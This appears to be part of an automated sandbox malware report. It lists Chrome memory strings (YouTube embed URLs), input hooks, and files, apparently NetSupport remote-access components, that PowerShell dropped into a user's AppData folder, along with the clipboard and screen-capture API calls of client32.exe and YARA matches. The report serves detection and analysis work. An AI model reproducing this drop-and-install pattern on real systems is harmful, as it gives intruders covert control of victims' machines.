                                  Source: chrome.exe, 00000000.00000002.2501891473.000028EC06D1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501943849.000028EC06D2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2342874633.000028EC06378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 
00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX(
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler
                                  Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2371291317.000028EC0800B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2364902944.000028EC07FB3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361454430.000028EC07F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 
00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
                                  Source: chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator
                                  Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjSQ?
                                  Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496982560.000028EC04B21000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496056454.000028EC048D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482855525.000028EC03537000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2493480651.000028EC04191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=
                                  Source: chrome.exe, 00000000.00000003.2352192649.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2323165506.000028EC04C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2351784432.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 
00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320456301.000028EC04810000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR(
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc);
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?siYrX
                                  Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6Uh0?
                                  Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?oFXXFw
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?xfMLzA
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/iframe_api
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505015083.000028EC07974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js
                                  Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb
                                  Source: chrome.exe, 00000000.00000003.2330677012.000028EC001CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js
                                  Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js
                                  Source: chrome.exe, 00000000.00000002.2485391480.000028EC037F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=FURi5aHgp1g
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=gobWGqPjLSQ&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%
                                  Source: chrome.exe, 00000000.00000003.2370628411.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC0803B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2370451846.000028EC04B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474534440.000028EC02B84000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385463463.000028EC08033000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370498638.000028EC033A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2506106388.000028EC07C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856897726.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370551942.000028EC038DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  Source: C:\Windows\System32\osk.exe Windows user hook set: Path: unknown Event Start: focus Event End: focus Module: NULL
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 call wnd proc C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 get message C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 call wnd proc C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 get message C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 call wnd proc C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 get message C:\Windows\System32\uiautomationcore.dll
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11032EE0 GetClipboardFormatNameA,SetClipboardData
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                  Source: Yara match File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                  Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                  System Summary

                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115750: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101BBA037_2_1101BBA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11087C6037_2_11087C60
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116DFCB37_2_1116DFCB
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1107009037_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1108048037_2_11080480
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115E98037_2_1115E980
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1101C9C037_2_1101C9C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110088AB37_2_110088AB
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11050D8037_2_11050D80
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8A98037_2_6CC8A980
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB491037_2_6CCB4910
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC984F037_2_6CC984F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB452837_2_6CCB4528
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCBA06337_2_6CCBA063
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB415637_2_6CCB4156
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA43C037_2_6CCA43C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB3DB837_2_6CCB3DB8
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB392337_2_6CCB3923
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8DBA037_2_6CC8DBA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC8176037_2_6CC81760
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCAD70F37_2_6CCAD70F
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11146450 appears 616 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97C70 appears 34 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CCA9480 appears 52 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 110278E0 appears 47 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC97A90 appears 56 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 1116F010 appears 37 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 11029450 appears 1009 times
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: String function: 6CC86F50 appears 155 times
